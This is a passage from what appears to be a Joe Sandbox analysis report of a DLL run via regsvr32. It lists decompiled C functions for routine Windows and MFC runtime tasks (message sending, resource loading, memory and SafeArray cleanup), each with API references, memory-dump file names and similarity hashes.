							_t32 = E1002229C( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10012115( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10012115( &_a4)));
								_v8 =  *((intOrPtr*)(E10012115( &_a4)));
								if((E10017A83(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E10017BAA( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E10017BAA( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E10017A83(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

0x10017ecc
0x10017ecd
0x10017ed0
0x10017ed7
0x10017edd
0x10017ee2
0x10017ef2
0x10017f0b
0x10017f13
0x10017f1b
0x10017f1e
0x10017f28
0x10017f69
0x10017f3e
0x10017f42
0x10017f4f
0x00000000
0x10017f51
0x10017f51
0x10017f57
0x00000000
0x10017fc4
0x10017fc4
0x10017fc4
0x00000000
0x10017fc4
0x10017f57
0x00000000
0x10017f4f
0x10017f74
0x10017f7e
0x10017fbd
0x10017f94
0x10017f99
0x10017f9c
0x10017fb1
0x10017fb1
0x10017fbb
0x00000000
0x00000000
0x10017f9e
0x10017fac
0x00000000
0x10017fae
0x10017fae
0x00000000
0x10017fae
0x10017fac
0x00000000
0x10017f9c
0x10017ef4
0x10017efd
0x10017f02
0x10017f05
0x10017fc7
0x10017fd0
0x00000000
0x00000000
0x00000000
0x10017f05
0x10017fd2
0x10017fd2
0x10017ee2
0x10017fd6

APIs

SendMessageA.USER32 ref: 10017EFD
SendMessageA.USER32 ref: 10017F62
SendMessageA.USER32 ref: 10017FA7
SendMessageA.USER32 ref: 10017FD0

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 20c07f7169c3d1fd542dabe4e85f7493f115e291a68c9aff9bfaa0f8e57f9e8f
Instruction ID: baa2da266dd1c3dce018d4e0db6ccd4fa4f71bdf7109174edae2865d4e814d47
Opcode Fuzzy Hash: 20c07f7169c3d1fd542dabe4e85f7493f115e291a68c9aff9bfaa0f8e57f9e8f
Instruction Fuzzy Hash: 89313774500119FBDB25DF91C881EAE7BB9FF41690F10806AF9098F251DA31ED81DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100218FC Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100218FC(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1001E375(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1001E302(_t51, _t65, 0, _t77) + 4));
					_t70 = E1002050A(0x100bdc04);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = L1004CC8F(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E100470E9(_t51, _t66, _t70, _t83);
								}
								_t37 = E10047026(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E10047026(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(L1004CC8F(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E10019F12();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x100218fc
0x100218fc
0x10021906
0x10021908
0x1002190f
0x100219e7
0x100219f2
0x100219f2
0x10021915
0x10021918
0x1002191b
0x00000000
0x00000000
0x10021924
0x10021968
0x10021968
0x1002196e
0x1002197b
0x1002197f
0x100219e6
0x00000000
0x10021985
0x10021985
0x10021988
0x1002198a
0x1002199b
0x100219a2
0x100219a4
0x100219a7
0x100219ab
0x100219ad
0x100219af
0x100219b0
0x100219b5
0x100219b8
0x100219bb
0x100219c1
0x100219c8
0x100219d0
0x100219d3
0x100219e3
0x100219e3
0x100219d3
0x00000000
0x100219a2
0x1002198c
0x10021999
0x00000000
0x00000000
0x00000000
0x10021999
0x1002197f
0x1002192a
0x1002192c
0x10021933
0x10021935
0x10021938
0x1002193a
0x1002193e
0x1002193e
0x1002193a
0x10021933
0x10021943
0x1002194b
0x10021953
0x1002195b
0x10021963
0x00000000

APIs

__msize.LIBCMT ref: 1002198D
__msize.LIBCMT ref: 100219B0
_malloc.LIBCMT ref: 100219C8
_malloc.LIBCMT ref: 100219DD

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 7e6aca9802086b6c4b7125c107ff73b07487bfd6a064de946bd2304e24c8b9b9
Instruction ID: ae32fc954f06dd924a99d51e7d75eaad46295e23dedae6a26b81c9720e256fe4
Opcode Fuzzy Hash: 7e6aca9802086b6c4b7125c107ff73b07487bfd6a064de946bd2304e24c8b9b9
Instruction Fuzzy Hash: 8F21A0391042119FCB54DFB0E896ADA77E5EF106A0F60856AE858CB146EB30EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1003F13E Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1003F13E(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				signed int _t35;
				void* _t37;
				void* _t44;
				signed short* _t57;
				signed int _t59;
				void* _t64;
				void* _t66;
				struct HINSTANCE__* _t67;
				void* _t69;
				void* _t71;

				_push(__ecx);
				_push(__ecx);
				_push(_t66);
				_v8 = __ecx;
				_t67 =  *(E1001E302(__ebx, __edi, _t66, __eflags) + 0xc);
				_t28 = FindResourceA(_t67, _a4, 0xf1);
				if(_t28 != 0) {
					_t29 = LoadResource(_t67, _t28);
					__eflags = _t29;
					_v12 = _t29;
					if(_t29 == 0) {
						goto L1;
					} else {
						_t69 = LockResource(_t29);
						__eflags = _t69;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t32 =  *(_t69 + 6) & 0x0000ffff;
							_push(__ebx);
							_push(__edi);
							_t59 = 4;
							_t60 = ( *(_t69 + 6) & 0x0000ffff) * _t59 >> 0x20;
							_t64 = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t32 * _t59);
							_t35 = 0;
							__eflags =  *(_t69 + 6);
							if( *(_t69 + 6) > 0) {
								_t13 = _t69 + 8; // 0x8
								_t57 = _t13;
								do {
									 *(_t64 + _t35 * 4) =  *_t57 & 0x0000ffff;
									_t60 =  *(_t69 + 6) & 0x0000ffff;
									_t35 = _t35 + 1;
									_t57 =  &(_t57[1]);
									__eflags = _t35 - ( *(_t69 + 6) & 0x0000ffff);
								} while (_t35 < ( *(_t69 + 6) & 0x0000ffff));
							}
							_t37 = E1003DD63(_v8, _t60, _t64,  *(_t69 + 6) & 0x0000ffff);
							_push(_t64);
							_t44 = _t37;
							E10009F3F(_t44, _t64, _t69, __eflags);
							__eflags = _t44;
							if(_t44 != 0) {
								_t54 =  *(_t69 + 4) & 0x0000ffff;
								E1003E51C(_v8, ( *(_t69 + 2) & 0x0000ffff) + 7, ( *(_t69 + 4) & 0x0000ffff) + 7,  *(_t69 + 2) & 0x0000ffff, _t54);
								_t44 = E1003E638(_v8, _t71, __eflags, _a4);
							}
							FreeResource(_v12);
							_t30 = _t44;
						}
					}
				} else {
					L1:
					_t30 = 0;
				}
				return _t30;
			}

0x1003f141
0x1003f142
0x1003f143
0x1003f144
0x1003f14c
0x1003f158
0x1003f160
0x1003f16b
0x1003f171
0x1003f173
0x1003f176
0x00000000
0x1003f178
0x1003f17f
0x1003f181
0x1003f183
0x00000000
0x1003f185
0x1003f185
0x1003f189
0x1003f18a
0x1003f18f
0x1003f190
0x1003f19f
0x1003f1a1
0x1003f1a3
0x1003f1a8
0x1003f1aa
0x1003f1aa
0x1003f1ad
0x1003f1b0
0x1003f1b3
0x1003f1b7
0x1003f1b9
0x1003f1ba
0x1003f1ba
0x1003f1ad
0x1003f1c7
0x1003f1cc
0x1003f1cd
0x1003f1cf
0x1003f1d4
0x1003f1d7
0x1003f1d9
0x1003f1ee
0x1003f1fe
0x1003f1fe
0x1003f203
0x1003f20a
0x1003f20c
0x1003f183
0x1003f162
0x1003f162
0x1003f162
0x1003f162
0x1003f20f

APIs

FindResourceA.KERNEL32 ref: 1003F158
LoadResource.KERNEL32(?,00000000), ref: 1003F16B
LockResource.KERNEL32(00000000), ref: 1003F179
FreeResource.KERNEL32(?), ref: 1003F203

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 3cd129bd3e95297c6130aa728ec632d8f413076899a2ba16ac84b1356596920a
Instruction ID: 7d04399fb8401ab0899cde0e742f6d9608f8fb1466ab0f43d1cb39ed68eb6d21
Opcode Fuzzy Hash: 3cd129bd3e95297c6130aa728ec632d8f413076899a2ba16ac84b1356596920a
Instruction Fuzzy Hash: C821B07A500221EEEB15DBB1CC858BBB7A8EF45642B00842DF982DA291EA34ED40D760

Uniqueness

Uniqueness Score: -1.00%

Function 10041D9B Relevance: 6.1, APIs: 4, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E10041D9B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E1004764D(0x100916ef, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E1001E397(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E1001D714();
						}
						L17:
						return E10047725(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E1001D714();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}

0x10041d9b
0x10041d9b
0x10041da2
0x10041dad
0x10041db3
0x10041dc0
0x10041dc3
0x10041e28
0x10041e28
0x10041e2b
0x10041e4d
0x10041e53
0x10041e55
0x10041e5f
0x10041e5f
0x10041e62
0x10041e62
0x10041e69
0x10041e6b
0x10041e6e
0x10041e6f
0x10041e6f
0x10041e77
0x10041e7c
0x10041e7c
0x10041e2d
0x10041e2d
0x10041e31
0x10041e34
0x10041e36
0x10041e39
0x10041e3a
0x10041e3a
0x10041e3f
0x10041e41
0x00000000
0x10041e41
0x10041dc8
0x00000000
0x00000000
0x10041dcf
0x10041dd7
0x00000000
0x10041dde
0x10041de4
0x10041deb
0x10041dfe
0x10041e02
0x10041e15
0x10041e20
0x10041e23
0x00000000
0x10041e23

APIs

__EH_prolog3.LIBCMT ref: 10041DA2
PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 10041DFC
PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 10041E13
PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 10041E4D

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: 1f76dbeb06708374ae703f7df48d55f204137604120caff3884b0899c8fdcaba
Instruction ID: ca689670030baaae4ba4fb0637ad45d80908a774964eb7643ea7462241452c8c
Opcode Fuzzy Hash: 1f76dbeb06708374ae703f7df48d55f204137604120caff3884b0899c8fdcaba
Instruction Fuzzy Hash: AD314B75A0074AEBDB20DFA5CD85E9EB7E8FF04344F610A29FA52E61C1D770AA40CB14

Uniqueness

Uniqueness Score: -1.00%

Function 100304E5 Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E100304E5(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E1003045C( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

0x100304e9
0x100304ee
0x10030592
0x10030592
0x100304f5
0x100304fd
0x10030511
0x10030514
0x1003056a
0x10030570
0x10030570
0x10030573
0x10030578
0x10030589
0x10030589
0x00000000
0x1003058f
0x10030516
0x10030517
0x1003055a
0x1003055a
0x1003055e
0x00000000
0x00000000
0x10030563
0x00000000
0x10030563
0x10030519
0x1003051c
0x10030552
0x00000000
0x10030552
0x1003051e
0x1003051f
0x00000000
0x10030521
0x10030521
0x10030524
0x1003052c
0x10030531
0x10030536
0x1003053f
0x10030542
0x10030547
0x1003054c
0x1003054c
0x10030547
0x10030536
0x00000000
0x10030524
0x1003051f
0x100304ff
0x10030503
0x00000000
0x10030505
0x10030506
0x00000000
0x10030506

APIs

SafeArrayDestroy.OLEAUT32 ref: 10030506
CoTaskMemFree.OLE32(?), ref: 10030589

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: 3c05bb5cf828d95ea5652f18c5bee6f27d9f082fd4a6a051cf433a8da4a67cf7
Instruction ID: 232c6462cfe77b3f68e9394470469af20e96d9e67133cfd8b3867fd55f94526e
Opcode Fuzzy Hash: 3c05bb5cf828d95ea5652f18c5bee6f27d9f082fd4a6a051cf433a8da4a67cf7
Instruction Fuzzy Hash: 73114A31A02A069FDB56CF65C8A8BAB7BE8EF017D2F104418F945CE1A0CB35DA00DE58

Uniqueness

Uniqueness Score: -1.00%

Function 100423B4 Relevance: 6.1, APIs: 4, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E100423B4(void* __ebx, void* __edi, void* __eflags) {
				void* __ecx;
				void* __esi;
				void* _t12;
				void* _t20;
				void* _t27;
				intOrPtr _t30;
				void* _t36;
				intOrPtr _t39;
				void* _t40;
				void* _t43;
				void* _t44;

				_t36 = __edi;
				_t27 = __ebx;
				_t39 = _t30;
				 *((intOrPtr*)(_t44 + 4)) = _t39;
				_t12 = E10013F46(__ebx, _t30, __edi, __eflags);
				if(_t12 != 0) {
					if((E100177F8(_t39) & 0x00000100) != 0) {
						_t32 = _t39;
						_t43 = E10015912(__ebx, _t39, __edi);
						_t48 = _t43;
						if(_t43 == 0) {
							E1000A069(__ebx, _t32, __edi, _t39, _t48);
						}
						_push(_t27);
						_push(_t36);
						_t40 = E10013FEA(_t27, _t32, _t43, GetForegroundWindow());
						if(_t43 == _t40 || E10013FEA(0x36d, _t32, _t43, GetLastActivePopup( *(_t43 + 0x20))) == _t40 && SendMessageA( *(_t40 + 0x20), 0x36d, 0x40, 0) != 0) {
							_t20 = 1;
							__eflags = 1;
						} else {
							_t20 = 0;
						}
						SendMessageA( *( *((intOrPtr*)(_t44 + 0x10)) + 0x20), 0x36d, 4 + (0 | _t20 == 0x00000000) * 4, 0);
					}
					return 1;
				}
				return _t12;
			}

0x100423b4
0x100423b4
0x100423b6
0x100423b8
0x100423bc
0x100423c3
0x100423d5
0x100423d7
0x100423de
0x100423e0
0x100423e2
0x100423e4
0x100423e4
0x100423e9
0x100423ea
0x100423fd
0x10042406
0x1004242f
0x1004242f
0x10042429
0x10042429
0x10042429
0x10042449
0x1004244c
0x00000000
0x10042450
0x10042453

APIs

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

GetForegroundWindow.USER32 ref: 100423EB
GetLastActivePopup.USER32(?), ref: 1004240B
SendMessageA.USER32 ref: 10042423
SendMessageA.USER32 ref: 10042449

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
String ID:
API String ID: 2019557511-0
Opcode ID: 41cb334477f83e6732df50886b9816101e4f0b09da1f08f8e6342bbf09e318ee
Instruction ID: 2b7d243d7015231387084009200a1c3232ee3d90a970c4ee94a08bcaeb9e426e
Opcode Fuzzy Hash: 41cb334477f83e6732df50886b9816101e4f0b09da1f08f8e6342bbf09e318ee
Instruction Fuzzy Hash: AA012BB6710215ABE701F7759C41F6E32ACDB887D5F114579F941C7060DA71DC018669

Uniqueness

Uniqueness Score: -1.00%

Function 1001BB0D Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1001BB0D(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1001E302(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
